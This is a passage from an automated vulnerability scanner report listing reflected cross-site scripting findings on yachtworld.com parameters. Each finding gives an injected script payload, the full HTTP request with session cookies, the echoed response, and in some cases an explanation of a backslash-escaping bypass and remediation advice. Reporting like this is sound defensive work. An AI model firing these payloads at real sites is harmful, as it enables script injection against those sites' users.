Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:37 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
ef="/core/listing/pl_display_photo.jsp?slim=broker&ybw=&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101717000&photo_name=Photo+2&photo=2&hosturl=starlingmarinee67a9"><script>alert(1)</script>b34780de9a4&&ywo=starlingmarine&">
...[SNIP]...

3.428. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 145b2'><script>alert(1)</script>5cfcbf92248 was submitted in the &hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine145b2'><script>alert(1)</script>5cfcbf92248&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:37 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 9104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine145b2'><script>alert(1)</script>5cfcbf92248&&ywo=starlingmarine&slim=broker&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101467000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.429. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &hosturl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d0e\'%3balert(1)//b41a583cb28 was submitted in the &hosturl parameter. This input was echoed as 71d0e\\';alert(1)//b41a583cb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine71d0e\'%3balert(1)//b41a583cb28&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:40 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 8861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine71d0e\\';alert(1)//b41a583cb28&&ywo=starlingmarine&slim=broker&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101467000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.430. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &units request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c72b'><script>alert(1)</script>71a58d6f5a4 was submitted in the &units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet8c72b'><script>alert(1)</script>71a58d6f5a4&id=2181684&lang=en&slim=broker&&hosturl=oceanalexandermarine&&ywo=oceanalexander HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:25:25 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=2181684&ybw=&hosturl=oceanalexandermarine&&ywo=oceanalexander&&units=Feet8c72b'><script>alert(1)</script>71a58d6f5a4&access=Public&listing_id=1841&url=&hosturl=oceanalexandermarine&&ywo=oceanalexander&'>
...[SNIP]...

3.431. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f970'><script>alert(1)</script>a63156b8ccd was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine8f970'><script>alert(1)</script>a63156b8ccd& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:43 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 14212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine8f970'><script>alert(1)</script>a63156b8ccd&slim=broker&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101467000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.432. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &ywo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5765a\'%3balert(1)//16aa928554e was submitted in the &ywo parameter. This input was echoed as 5765a\\';alert(1)//16aa928554e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine5765a\'%3balert(1)//16aa928554e& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:44 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 14026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine5765a\\';alert(1)//16aa928554e&slim=broker&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101467000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.433. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac602"><script>alert(1)</script>0e861c65cac was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarineac602"><script>alert(1)</script>0e861c65cac& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:43 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 14211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
_display_photo.jsp?slim=broker&ybw=&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101717000&photo_name=Photo+2&photo=2&hosturl=starlingmarine&&ywo=starlingmarineac602"><script>alert(1)</script>0e861c65cac&">
...[SNIP]...

3.434. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [checked_boats parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the checked_boats request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d758'%3balert(1)//bdf0a9dfb63 was submitted in the checked_boats parameter. This input was echoed as 9d758';alert(1)//bdf0a9dfb63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/pl_boat_detail.jsp?hosturl=galatiyachts&checked_boats=20302029d758'%3balert(1)//bdf0a9dfb63&featuredon=yw-en-TX&slot=1&slim=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:26:45 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "20302029d758';alert(1)//bdf0a9dfb63"<br>
...[SNIP]...

3.435. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

